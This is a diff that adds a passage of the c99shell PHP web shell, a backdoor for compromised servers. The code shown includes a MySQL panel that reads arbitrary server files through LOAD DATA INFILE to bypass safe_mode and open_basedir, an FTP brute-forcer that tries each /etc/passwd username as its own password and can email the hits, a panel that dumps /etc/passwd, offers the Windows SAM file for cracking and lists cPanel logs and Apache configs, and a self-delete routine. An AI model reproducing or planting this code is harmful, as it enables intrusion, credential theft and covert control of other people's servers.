+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>»</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
